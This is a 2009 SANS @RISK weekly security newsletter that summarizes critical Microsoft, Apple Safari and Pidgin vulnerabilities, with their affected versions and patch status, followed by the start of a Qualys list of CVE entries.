Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: VIII, Issue: 24
June 11, 2009

SANS Newsletters Home

A huge number of very critical Microsoft vulnerabilities this week, but don't ignore the Apple Safari problems.

Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Platform Number of Updates and Vulnerabilities
    • - ------------------------ -------------------------------------
    • Windows
    • 7 (#7, #13, #14)
    • Microsoft Office
    • 11 (#2, #3, #4, #12)
    • Other Microsoft Products
    • 12 (#1, #5, #9, #11)
    • Third Party Windows Apps
    • 3
    • Solaris
    • 3
    • Aix
    • 1
    • Unix
    • 2
    • Cross Platform
    • 23 (#6, #8, #10)
    • Web Application - Cross Site Scripting
    • 4
    • Web Application - SQL Injection
    • 4
    • Web Application
    • 9
    • Network Device
    • 1

******************** Sponsored By Sourcefire, Inc. **********************

Your Network Security Isn't Good Enough Anymore

Today's threats-and networks-are dynamic. Unfortunately most network security systems are not.

Join Martin Roesch, Founder and CTO of Sourcefire(r) and Creator of Snort(r), in a series of seminars, as he shows why network security must include full network visibility, relevant context, and automated impact assessment to be effective.

More information http://www.sans.org/info/44693

*************************************************************************

TRAINING UPDATE - - SANSFIRE in Baltimore 6/13-6/20 (24 long courses, 12 short courses) http://www.sans.org/sansfire09/event.php - - Rocky Mountain SANS, July 7-13 (6 full-length hands-on courses) http://www.sans.org/rockymnt2009/event.php - - SANS Boston, Aug 2-9 (6 full-length hands-on courses) https://www.sans.org/boston09/index.php - - National Forensiscs Summit, July 6-14 http://www.sans.org/forensics09_summit/ Looking for training in your own community? http://sans.org/community/ Save 25% on all On-Demand training (30 full courses) - See samples at http://www.sans.org/ondemand/spring09.php Plus Amsterdam, London, Dubai, Riyahd, Cairo, Melbourne, Canberra, and Singapore all in the next 90 days. For a list of all upcoming events, on-line and live: www.sans.org

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Microsoft Office
Other Microsoft Products
Third Party Windows Apps
Solaris
Aix
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

************************* Sponsored Links ******************************

1) SANS Recommended Webcast Replay featuring Novell: Enabling a Productive, Mobile Workforce with Endpoint Security http://www.sans.org/info/44698

2) SANS Vendor Demo Spotlight: CA - Identity Lifecycle Management - Increase efficiency & reduce costs! Securely manage identities throughout their lifecycles with ease. http://www.sans.org/info/44703

3) Register Now for the Upcoming Webcast: How to Manage Endpoints in a Distributed, Cloud-based Environment. Sponsored by BigFix http://www.sans.org/info/44708

*************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohan Kotian at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (3) CRITICAL: Microsoft Office Word Multiple Vulnerabilities (MS09-027)
  • Affected:
    • Microsoft Office 2000 Service Pack 3
    • Microsoft Office XP Service Pack 3
    • Microsoft Office 2003 Service Pack 3
    • 2007 Microsoft Office System Service Pack 1
    • 2007 Microsoft Office System Service Pack 2
    • Microsoft Office 2004 for Mac
    • Microsoft Office 2008 for Mac
    • Open XML File Format Converter for Mac
    • Microsoft Office Word Viewer 2003 Service Pack 3
    • Microsoft Office Word Viewer
    • Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 1
    • Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

  • Description: Microsoft Word contains multiple vulnerabilities in file-format processing code. A specially-crafted Word document file could exploit one of these vulnerabilities. There are two buffer overflow vulnerabilities in Microsoft Word in the way it handles Word files with malformed records. One of the vulnerability is a flaw due to improper boundary checks on the part of Microsoft Word while parsing vulnerable tags within a crafted Word document. Successful exploitation leads to memory corruption in such a way that an attacker can execute arbitrary code with the privileges of the current user. To exploit these flaws, an attacker might take one of the following actions: (a) Create a webpage that downloads a malicious Word document from a server, and entice an attacker to visit his webpage. (b) Send an email with a specially crafted Word document as an attachment and convince the user to open it. Note that, on recent versions of Microsoft Office, Word documents are not opened upon receipt without first prompting the user. Some technical details are publicly available for these vulnerabilities.

  • Status: Vendor confirmed, updates available.

  • References:
  • (4) CRITICAL: Microsoft Works Converter Buffer Overflow Vulnerability (MS09-024)
  • Affected:
    • Microsoft Office 2000 Service Pack 3
    • Microsoft Office XP Service Pack 3
    • Microsoft Office 2003 Service Pack 3
    • 2007 Microsoft Office System Service Pack 1
    • Microsoft Works version 8.5
    • Microsoft Works version 9

  • Description: The Microsoft Works Converter included with Microsoft Word is used to convert documents created by Microsoft Works into other formats. There is a buffer overflow vulnerability caused due to the way Microsoft Works Converter parses font names in a specially crafted Works (.wps) files. Successfully exploiting this vulnerability would lead to denial of service condition or arbitrary code execution with the privileges of the current user. To exploit these flaws, an attacker might take one of the following actions: (a) Create a webpage that downloads a malicious Works document from a server, and entice an attacker to visit his webpage. (b) Send an email with a specially crafted Works document as an attachment and convince the user to open it. Note that on recent versions of Microsoft Office, documents are not opened upon receipt without user intervention.

  • Status: Vendor confirmed, updates available.

  • References:
  • (5) CRITICAL: Microsoft Active Directory Multiple Vulnerabilities (MS09-018)
  • Affected:
    • Microsoft Windows 2000 Server Service Pack 4
    • Microsoft Windows XP Professional Service Pack 2
    • Microsoft Windows XP Professional Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)

  • Description: Active Directory is Microsoft's implementation of the Lightweight Directory Access Protocol (LDAP), a network protocol designed to provide access to distributed directories, and is an integral part of several Microsoft products and operating systems. There are two vulnerabilities in the way LDAP service handles specially crafted LDAP requests. The first issue is caused because of memory being freed incorrectly when the LDAP service handles the specially crafted LDAP or LDAPS (LDAP over SSL) requests. Successful exploitation might allow an attacker to execute arbitrary code. The second issue because of improper memory management on the part of LDAP service while processing specially crafted LDAP or LDAPS requests. Successful exploitation will lead to a denial of service condition.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (7) CRITICAL: Microsoft Windows Print Spooler Multiple Vulnerabilities (MS09-022)
  • Affected:
    • Microsoft Windows 2000 Service Pack 4
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)
    • Microsoft Windows Vista
    • Microsoft Windows Vista Service Pack 1
    • Microsoft Windows Vista Service Pack 2
    • Microsoft Windows Vista x64 Edition
    • Microsoft Windows Vista x64 Edition Service Pack 1
    • Microsoft Windows Vista x64 Edition Service Pack 2
    • Microsoft Windows Server 2008 for 32-bit
    • Microsoft Windows Server 2008 for 32-bit Service Pack 2
    • Microsoft Windows Server 2008 x64
    • Microsoft Windows Server 2008 x64 Service Pack 2
    • Microsoft Windows Server 2008 for Itanium Systems
    • Microsoft Windows Server 2008 for Itanium Systems Service Pack 2

  • Description: Windows print spooler service (spoolsv.exe) is responsible for tasks related to print jobs such as, retrieving and loading the correct printer driver, scheduling a print job, sending data to printer. Multiple vulnerabilities have been identified in the Windows print spooler service. The first issue is a buffer overflow vulnerability caused due to improper parsing of certain printing data structures. Successful exploitation might allow an attacker to execute arbitrary code. The second issue is information disclosure vulnerability caused due to inadequate checks, on the part of the Windows Printing Service, specifically on files what can be included with separator pages. The third issue is an elevation of privilege vulnerability caused due to inadequate validation, on the part of Windows Print Spooler service, on the paths from which a dynamic-link library (DLL) may be loaded. Successful exploitation might lead to arbitrary code execution.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (8) CRITICAL: Apple Safari Multiple Vulnerabilities
  • Affected:
    • Apple Safari versions prior to 4.0

  • Description: Apple's Safari web browser, installed by default on all recent versions of Mac OS X, contains multiple vulnerabilities. The first issue is a memory corruption vulnerability caused due to improper garbage collection of JavaScript set elements in WebCore. The second is an uninitialized pointer issue caused due to calling a method for an object that doesn't exist. The third issue is a memory corruption vulnerability caused to improper handling of attr() function in a CSS content object. The fourth issue is an error in CFNetwork caused due to misidentification of certain image files as HTML, leading to JavaScript execution. The fifth issue is information disclosure vulnerability due to errors in CFNetwork. The sixth issue is caused due to memory corruption errors in CoreGraphics while processing arguments. The seventh issue is also caused to memory corruption errors in CoreGraphics but while handling TrueType fonts. The eighth issue is in FreeType v2.3.8, which has multiple integer overflows. The ninth issue is in CoreGraphics handling malicious PDF files which might lead to memory corruption. The tenth issue exists while handling PNG files caused due to uninitialized pointers. The eleventh issue is caused due to improper handling of certain character encodings by ICU. The twelfth issue is multiple vulnerabilities in libxml2 version 2.6.16. The thirteenth issue is bypass of revocation checking caused due to improper handling of EV certificates. The fourteenth issue is that the Reset button in Reset Safari may not remove website passwords from memory immediately. The fifteenth issue is an error in Private Browsing feature. The sixteenth issue is an error in open-help-anchor URL handler which may lead to disclosure of local file content. The Seventeenth issue is an error in Safari Windows Installer which might lead to Safari being run with elevated privileges for its initial launch. There are some more cross-site scripting, Website spoofing, memory corruption, type conversion errors in Apple Webkit which might lead to remote code execution for the attackers. Some technical details for some of these vulnerabilities are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (9) HIGH: Microsoft Internet Information Services (IIS) WebDAV Authentication Bypass Vulnerabilities (MS09-020)
  • Affected:
    • Microsoft Internet Information Services 5.0
    • Microsoft Internet Information Services 5.1
    • Microsoft Internet Information Services 6.0

  • Description: Microsoft Internet Information Services (IIS), a set of Internet-based services for servers created by Microsoft, has elevation of privilege vulnerabilities. The specific flaw lies in the WebDAV plug-in, an extension of HTTP, of the affected IIS servers. The WebDAV plug-in does not decode the URL's in the HTTP requests properly which might result in WebDAV applying an incorrect configuration, a configuration that might allow an anonymous access. Thus a specially crafted HTTP request then will be able to bypass authentication. Some technical details about these vulnerabilities are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (10) MODERATE: MSN Protocol SLP Message Heap Overflow Vulnerability
  • Affected:
    • Adium 1.x
    • Pidgin version prior to 2.5.6

  • Description: Libpurple is a library implementing the Microsoft Network (MSN) Messenger protocol, which is used for instant messaging. Libpurple's implementation of this protocol is used by numerous clients, including Pidgin and Adium. Pidgin is installed by default on numerous Linux, UNIX, and Unix-like operating systems, and Adium is a popular instant messaging application for Apple Mac OS X. Libpurple library's MSN protocol implementation has heap overflow vulnerability specifically while handling SLP messages. The function "msn_slplink_process_msg()" does not check the offset value in a SLP packet adequately, as a result of a specially crafted SLP packet can overflow a heap buffer. Successful exploitation might lead to arbitrary code execution.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (11) MODERATE: Microsoft RPC Marshalling Engine Vulnerability (MS09-026)
  • Affected:
    • Microsoft Windows 2000 Service Pack 4
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)
    • Microsoft Windows Vista
    • Microsoft Windows Vista Service Pack 1
    • Microsoft Windows Vista Service Pack 2
    • Microsoft Windows Vista x64 Edition
    • Microsoft Windows Vista x64 Edition Service Pack 1
    • Microsoft Windows Vista x64 Edition Service Pack 2
    • Microsoft Windows Server 2008 (32-bit)
    • Microsoft Windows Server 2008 (32-bit) Service Pack 2
    • Microsoft Windows Server 2008 (x64)
    • Microsoft Windows Server 2008 (x64) Service Pack 2
    • Microsoft Windows Server 2008 (Itanium)
    • Microsoft Windows Server 2008 (Itanium) Service Pack 2

  • Description: Microsoft Windows Remote Procedure Call (RPC) Marshalling Engine, which provides a common RPC interface between RPC clients and servers has an elevation of privilege vulnerability. The specific flaw is caused due to RPC Marshalling Engine not updating its internal state appropriately, thus resulting to pointer being read from an incorrect location courtesy a specially crafted RPC message. Successful exploitation might allow an attacker to execute arbitrary code. Note that Microsoft Windows are not delivered with any RPC servers and clients, thus in default configuration users could not be exploited by this vulnerability. However, the vulnerability could affect third-party RPC applications. Some technical details about this vulnerability are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (12) MODERATE: Microsoft PowerPoint Freelance parsing Vulnerability
  • Affected:
    • Microsoft Office PowerPoint 2000
    • Microsoft Office PowerPoint 2002

  • Description: Microsoft Office PowerPoint, a presentation program from Microsoft, has heap-based buffer overflow vulnerability. Specially crafted Freelance files when viewed or opened can trigger this vulnerability. The flaw is caused due to an array indexing error in the Microsoft PowerPoint Freelance Windows 2.1 Translator "FL21WIN.DLL" while parsing layout information. Successful exploitation might lead to arbitrary code execution. Note that systems with MS09-017 applied are not vulnerable to this, since the support for Freelance files is disabled by default, thereby blocking the opening of Freelance files by default. But there is a workaround to this and the support can be re-enabled via a key in the registry. Microsoft has stated that no fix will be issued for this and so, users that have enabled Freelance file support should not open Freelance files from untrusted sources.

  • Status: Vendor has confirmed, no updates available.

  • References:
  • (13) LOW: Microsoft Windows Kernel Local Elevation of Privilege Vulnerabilities (MS09-025)
  • Affected:
    • Microsoft Windows 2000 Service Pack 4
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)
    • Microsoft Windows Vista
    • Microsoft Windows Vista Service Pack 1
    • Microsoft Windows Vista Service Pack 2
    • Microsoft Windows Vista x64 Edition
    • Microsoft Windows Vista x64 Edition Service Pack 1
    • Microsoft Windows Vista x64 Edition Service Pack 2
    • Microsoft Windows Server 2008 (32-bit)
    • Microsoft Windows Server 2008 (32-bit)
    • Microsoft Windows Server 2008 (x64)
    • Microsoft Windows Server 2008 (x64) Service Pack 2
    • Microsoft Windows Server 2008 (Itanium)
    • Microsoft Windows Server 2008 (Itanium) Service Pack 2

  • Description: Microsoft Windows Kernel, the core of the operating system that provides system level services, has got multiple elevation of privilege vulnerabilities. The first issue is an error in the way that Windows kernel validates changes in certain kernel objects. The second issue is caused due to inadequate validation of pointers from the user mode. The third issue is caused due inadequate validation of an argument passed to a system call. The fourth issue is due to inadequate checks on the inputs from the user mode while editing a specific desktop parameter. Successful exploitation might allow an attacker to run arbitrary code in kernel mode. Some technical details for this vulnerability are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (14) LOW: Microsoft Windows Search Information Disclosure Vulnerability (MS09-023)
  • Affected:
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2

  • Description: Microsoft Windows Search, a feature that allows instant search capabilities for files, e-mails, contacts and etc, has an information disclosure vulnerability. The specific flaw is caused due to Windows Search not restricting the environment, within which scripts are executed, adequately. Successful exploitation might allow an attacker to run a malicious script. Note that the Windows Search component is not preinstalled by default on Microsoft Windows XP and Microsoft Windows Server 2003.

  • Status: Vendor has confirmed, updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 24, 2009

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 7103 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 09.24.1 - CVE: CVE-2009-1124
  • Platform: Windows
  • Title: Microsoft Windows Pointer Validation Local Privilege Escalation
  • Description: Microsoft Windows is exposed to a local privilege escalation vulnerability that occurs in the Windows kernel. This issue occurs because the software fails to properly validate certain pointers passed from user mode to kernel mode.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-025.mspx
  • 09.24.2 - CVE: CVE-2009-1125
  • Platform: Windows
  • Title: Microsoft Windows Argument Validation Local Privilege Escalation
  • Description: Microsoft Windows is exposed to a local privilege escalation issue that occurs in the Windows kernel. This issue occurs because the software fails to properly validate arguments passed to a system call. An attacker can exploit this issue to execute arbitrary code with kernel-level privileges.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-025.mspx
  • 09.24.3 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness
  • Description: DNS devolution is a feature of the Microsoft Windows DNS client application. It allows Windows DNS clients to resolve DNS queries for single-label unqualified hostnames by progressively removing subdomains until the single-label hostname is found. A single-label hostname is a name that does not contain a suffix such as ".com" or ".net". Windows is exposed to a weakness that affects the Windows DNS client and arises because of a design error in the DNS devolution process. This issue may allow an attacker to host systems outside of the organizational boundary, but the resolver will treat the systems as internal to the organization's boundary.
  • Ref: http://www.microsoft.com/technet/security/advisory/971888.mspx
  • 09.24.4 - CVE: CVE-2009-0228
  • Platform: Windows
  • Title: Microsoft Windows Print Spooler Remote Buffer Overflow
  • Description: Print Spooler is a service in Microsoft Windows that manages the printing process. The Print Spooler service is exposed to a buffer overflow issue because the software fails to properly parse certain printing data structures. Specifically, "ShareName" values aren't handled properly during enumeration.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-022.mspx
  • 09.24.5 - CVE: CVE-2009-0229
  • Platform: Windows
  • Title: Microsoft Windows Print Spooler Local Information Disclosure
  • Description: Print Spooler is a service in Microsoft Windows that manages the printing process. The Print Spooler service is exposed to a local information disclosure issue because it fails to put any restrictions on the files that can be included from separator pages. Specifically, the Windows Printing Service allows users to include any file on the local system.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-022.mspx
  • 09.24.6 - CVE: CVE-2009-0230
  • Platform: Windows
  • Title: Microsoft Windows Print Spooler Remote Code Execution
  • Description: Print Spooler is a service in Microsoft Windows that manages the printing process. The Print Spooler service is exposed to a remote code execution issue because it fails to validate the paths from which a DLL may be loaded.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-022.mspx
  • 09.24.7 - CVE: CVE-2009-0239
  • Platform: Windows
  • Title: Microsoft Windows Search Script Injection
  • Description: Microsoft Windows Search is a search solution for Windows-based systems. Microsoft Windows Search is exposed to a script injection issue because it fails to adequately sanitize user-supplied input when previewing search results. Successful exploits will cause malicious script code to run in the local context, allowing attackers to steal potentially sensitive information or perform other attacks. Windows Search installed on all supported editions of Windows XP and Windows Server 2003 are affected.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-023.mspx
  • 09.24.8 - CVE: CVE-2009-1533
  • Platform: Microsoft Office
  • Title: Microsoft Office Works for Windows Document Converters Remote Code Execution
  • Description: Microsoft Office Works for Windows document converters are used by Microsoft Office applications to interact with documents in the Microsoft Works file format. Microsoft Office Works for Windows document converters are exposed to a remote code execution issue because the application fails to properly handle specially crafted files. The vulnerability occurs when the application processes a specially crafted ".wps" file and fails to adequately bounds check user-supplied data before copying it into a stack-based buffer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-024.mspx
  • 09.24.9 - CVE: CVE-2009-0563
  • Platform: Microsoft Office
  • Title: Microsoft Word Record Parsing (CVE-2009-0563) Remote Code Execution
  • Description: Microsoft Word is a word processor available for multiple platforms. Word is exposed to a remote code execution issue that stems from a buffer overflow condition when the application processes a specially crafted Word file with a malformed record value.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-027.mspx
  • 09.24.10 - CVE: CVE-2009-0565
  • Platform: Microsoft Office
  • Title: Microsoft Word Record Parsing (CVE-2009-0565) Remote Code Execution
  • Description: Microsoft Word is a word processor available for multiple platforms. Word is exposed to a remote code execution issue that stems from a buffer overflow condition when the application processes a specially crafted Word file with a malformed record value.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-027.mspx
  • 09.24.11 - CVE: CVE-2009-0549
  • Platform: Microsoft Office
  • Title: Microsoft Excel Record Pointer Corruption Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue that occurs when the application parses an Excel file that contains a malformed record object.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx
  • 09.24.12 - CVE: CVE-2009-0557
  • Platform: Microsoft Office
  • Title: Microsoft Excel Record Object Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because of memory corruption when the application handles a specially crafted record object.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx
  • 09.24.13 - CVE: CVE-2009-0558
  • Platform: Microsoft Office
  • Title: Microsoft Excel Array Indexing Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because of memory corruption when the application handles a specially crafted record object.
  • Ref: http://www.securityfocus.com/archive/1/504188
  • 09.24.14 - CVE: CVE-2009-0559
  • Platform: Microsoft Office
  • Title: Microsoft Excel String Copy Stack Overflow Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. Memory may become corrupted because a string copy operation could trigger a stack-based buffer overflow when the application handles a specially crafted Excel file.
  • Ref: http://www.securityfocus.com/archive/1/504180
  • 09.24.15 - CVE: CVE-2009-0560
  • Platform: Microsoft Office
  • Title: Microsoft Excel Field Sanitization Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because the software fails to properly handle malformed data in an unspecified field, which can lead to memory corruption.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx
  • 09.24.16 - CVE: CVE-2009-0561
  • Platform: Microsoft Office
  • Title: Microsoft Excel Malformed Record Object Integer Overflow
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to an integer overflow issue when parsing malformed Excel files. This issue occurs because the software fails to properly handle data in a malformed record object, which can lead to memory corruption.
  • Ref: http://www.securityfocus.com/archive/1/504190
  • 09.24.17 - CVE: CVE-2009-1134
  • Platform: Microsoft Office
  • Title: Microsoft Excel Record Pointer Corruption Variant Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because of memory corruption when the application handles a specially crafted record object.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx
  • 09.24.18 - CVE: CVE-2009-0202
  • Platform: Microsoft Office
  • Title: Microsoft PowerPoint Freelance Layout Parsing Heap Based Buffer Overflow
  • Description: Freelance files are presentation files used with Lotus Freelance Graphics which is a presentation software as part of the Lotus SmartSuite collection. They can be translated and used with Microsoft PowerPoint. Microsoft PowerPoint is exposed to a heap-based buffer overflow issue that affects the Microsoft PowerPoint Freelance Windows 2.1 Translator ("FL21WIN.DLL").
  • Ref: http://secunia.com/secunia_research/2009-29/
  • 09.24.19 - CVE: CVE-2009-1141
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1141) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when the application displays a webpage containing unexpected calls to HTML objects. Successful exploits will allow the attacker to execute arbitrary code in the context of the user running the application, which can compromise the application and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
  • 09.24.20 - CVE: CVE-2009-1140
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Cached Content Cross Domain Information Disclosure
  • Description: Microsoft Internet Explorer is a web browser available for Microsoft Windows. The browser is exposed to a cross-domain information disclosure issue because it fails to properly enforce the same-origin policy. Specifically, it fails to prevent cached content from being rendered as HTML.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
  • 09.24.21 - CVE: CVE-2009-0568
  • Platform: Other Microsoft Products
  • Title: Microsoft RPC Marshalling Engine Remote Code Execution
  • Description: Microsoft Windows RPC Marshalling Engine is a component that provides a common RPC interface between RPC clients and servers. RPC Marshalling Engine is exposed to a remote code execution issue because it fails to properly update the internal state, causing a pointer to be read from an incorrect location.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-026.mspx
  • 09.24.22 - CVE: CVE-2009-1528
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1528) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access uninitialized memory related to HTML objects. Attackers can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
  • 09.24.23 - CVE: CVE-2009-1529
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1529) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access objects that haven't been properly initialized or have been deleted. The attacker can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
  • 09.24.24 - CVE: CVE-2009-1530
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1530) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access HTML objects that have not been initialized or have been deleted. Successful exploits will allow the attacker to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
  • 09.24.25 - CVE: CVE-2009-1531
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1531) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access HTML objects that haven't been properly initialized or have been deleted. The attacker can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
  • 09.24.26 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1532) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access HTML objects that haven't been properly initialized or have been deleted. The attacker can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
  • 09.24.27 - CVE: CVE-2008-0024
  • Platform: Other Microsoft Products
  • Title: Microsoft Visual Studio "MSCOMM32.OCX" ActiveX Control Heap Buffer Overflow
  • Description: Microsoft Visual Studio is a suite of tools for software development. Visual Studio is exposed to a heap-based buffer overflow issue that affects the "MSCOMM32.OCX" ActiveX control. Successful exploits will allow attackers to execute arbitrary code within the context of the affected application that uses the ActiveX control (typically Internet Explorer).
  • Ref: http://www.iss.net/threats/328.html
  • 09.24.28 - CVE: CVE-2009-1139
  • Platform: Other Microsoft Products
  • Title: Microsoft Active Directory Memory Leak Denial of service
  • Description: Microsoft Active Directory is an LDAP (Lightweight Directory Access Protocol) implementation distributed with multiple Windows operating systems. The application is exposed to a denial of service issue that stems from improper memory management when processing specially crafted LDAP or LDAPS requests containing specific Object Identifier (OID) filters.
  • Ref: http://www.microsoft.com/technet/security/bulletin/ms09-018.mspx
  • 09.24.29 - CVE: CVE-2009-1138
  • Platform: Other Microsoft Products
  • Title: Microsoft Active Directory Memory Corruption Remote Code Execution
  • Description: Microsoft Active Directory is an LDAP (Lightweight Directory Access Protocol) implementation distributed with multiple Windows operating systems. Microsoft Active Directory is exposed to a remote code execution issue because the software fails to properly free memory when handling specially crafted LDAP or LDAPS requests.
  • Ref: http://www.microsoft.com/technet/security/bulletin/ms09-018.mspx
  • 09.24.30 - CVE: CVE-2009-1122
  • Platform: Other Microsoft Products
  • Title: Microsoft IIS 5.0 WebDAV Authentication Bypass
  • Description: Microsoft Internet Information Services (IIS) is a webserver available for Microsoft Windows. The application is exposed to an authentication bypass issue because the WebDAV extension for IIS fails to properly enforce access restrictions on certain requests to a site that requires authentication. IIS version 5.0 is affected.
  • Ref: http://www.microsoft.com/technet/security/bulletin/ms09-020.mspx
  • 09.24.31 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: SAP AG SAPgui "sapirrfc.dll" ActiveX Control Buffer Overflow
  • Description: SAP AG SAPgui is a graphical user interface (GUI) included in various SAP applications. The application is exposed to a remote buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. SAPgui version 6.4 is affected.
  • Ref: http://www.securityfocus.com/archive/1/504141
  • 09.24.32 - CVE: CVE-2008-2475
  • Platform: Third Party Windows Apps
  • Title: eBay Enhanced Picture Services ActiveX Control Remote Code Execution
